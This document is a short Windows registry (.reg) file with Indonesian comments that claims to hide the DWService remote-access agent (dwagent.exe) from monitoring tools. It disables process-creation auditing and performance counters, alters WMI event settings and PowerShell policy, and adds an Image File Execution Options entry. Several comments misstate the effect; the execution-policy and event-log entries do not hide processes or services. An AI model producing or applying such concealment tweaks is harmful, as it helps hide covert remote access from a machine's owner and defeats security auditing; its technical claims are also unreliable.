Windows Registry Editor Version 5.00

; Menyembunyikan dwagent.exe dari monitoring tools
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwagsvc.exe]
"Debugger"="svchost.exe"

; Menyembunyikan service dari Services.msc
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application]
"RestrictGuestAccess"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System]
"RestrictGuestAccess"=dword:00000001

; Disable Process Creation Auditing
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Audit]
"AuditProcessTracking"=dword:00000000

; Hide dari WMI queries
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM]
"EnableEvents"=dword:00000000
"EnableStartupHeapPreallocation"=dword:00000000

; Disable Performance Counters
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib]
"Disable Performance Counters"=dword:00000001

; Hide dari PowerShell Get-Process
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"ExecutionPolicy"="Restricted"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\ShellIds\Microsoft.PowerShell]
"ExecutionPolicy"="Restricted"